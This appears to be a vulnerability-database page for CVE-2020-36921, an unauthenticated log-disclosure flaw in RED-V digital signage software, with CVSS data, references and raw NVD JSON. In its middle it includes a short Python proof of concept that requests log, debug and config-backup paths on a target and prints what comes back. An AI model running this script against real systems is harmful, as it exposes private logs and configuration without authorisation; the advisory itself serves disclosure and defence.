CVE-2020-36921

Description

RED-V Super Digital Signage System 5.1.1 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive webserver log files. Attackers can visit multiple endpoints to retrieve system resources and debug log information without authentication.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

RED-V Super Digital Signage System < 5.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2020-36921 PoC
# RED-V Super Digital Signage System Information Disclosure

target = input("Enter target URL: ")
endpoints = [
    "/logs/access.log",
    "/logs/error.log",
    "/debug/logs",
    "/system/info",
    "/config/backup"
]

for endpoint in endpoints:
    url = f"{target}{endpoint}"
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Found: {url}")
            print(response.text[:500])
    except requests.exceptions.RequestException:
        pass

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36921
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36921
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36921/
[4] VulDB https://vuldb.com/cve/CVE-2020-36921
[5] https://cxsecurity.com/issue/WLB-2020110130
[6] https://exchange.xforce.ibmcloud.com/vulnerabilities/191803
[7] https://packetstormsecurity.com/files/160073
[8] https://www.red-v.tv/
[9] https://www.vulncheck.com/advisories/red-v-super-digital-signage-system-log-information-disclosure-vulnerability
[10] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36921", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "RED-V Super Digital Signage System 5.1.1 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive webserver log files. Attackers can visit multiple endpoints to retrieve system resources and debug log information without authentication."}, {"lang": "es", "value": "RED-V Super Digital Signage System 5.1.1 contiene una vulnerabilidad de revelación de información que permite a atacantes no autenticados acceder a archivos de registro sensibles del servidor web. Los atacantes pueden visitar múltiples puntos finales para recuperar recursos del sistema e información de registro de depuración sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-548"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020110130", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191803", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/160073", "source": "[email protected]"}, {"url": "https://www.red-v.tv/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/red-v-super-digital-signage-system-log-information-disclosure-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php", "source": "[email protected]"}]}}